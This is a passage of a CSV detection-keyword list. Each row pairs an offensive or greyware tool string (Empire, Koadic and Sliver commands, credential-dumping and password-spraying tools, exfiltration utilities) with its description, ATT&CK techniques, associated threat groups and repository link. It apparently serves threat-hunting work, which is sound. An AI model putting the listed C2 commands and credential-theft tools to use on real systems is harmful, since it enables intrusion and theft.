T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*updog --*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog -d /*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog -p *","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog-master.zip*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*upload-dll * *.dll*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*UploadFileImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*UrbanBishop.exe*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*ursnif_IcedID.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*USBPcap*","offensive_tool_keyword","usbpcap","USB capture for Windows.","T1115 - T1129 - T1052","TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" +"*use exploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*use implant/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*use incognito*","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*use powershell_stageless*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*use safetykatz*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*use stager/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*UseBeaconCmd*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*uselistener dbx*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*uselistener onedrive*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usemodule persistence/*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*usemodule powershell/persistence*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*usemodule privesc/*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*useplugin csharpserver*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*UsePrtAdminAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*UsePrtImperonsationAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*user Inveigh*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*--user orbitaldump*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*user_eq_pass_valid_cme_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*--user_file*--password_file*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*user_password.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*user_to_secretsdump.py*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*user|username|login|pass|password|pw|credentials*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*UserEnum*","offensive_tool_keyword","UserEnum","The three scripts provided here allow one to establish if a user exist on a Windows domain. without providing any authentication. These user enumeration scripts use the DsrGetDcNameEx2.CLDAP ping and NetBIOS MailSlot ping methods respectively to establish if any of the usernames in a provided text file exist on a remote domain controller.","T1210.001 - T1213 - T1071.001","TA0007 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/sensepost/UserEnum","1","1","N/A","N/A","3","209","45","2018-06-03T19:08:37Z","2018-05-21T16:55:58Z" +"*UserHunterImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*username-anarchy *","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","N/A","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","0","N/A","N/A","6","564","113","2022-01-26T18:34:02Z","2012-11-07T05:35:10Z" +"*UsernameAsPasswordCreds.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*userpass_cme_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*userpass_kerbrute_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*UserPassBruteForce*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*users/public/troubleshooting_log.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*users\\public\\elevationstation.js*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*users\\usethis\\NewFile.txt*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*users\public\example.bin*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*users\public\temp.bin*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential 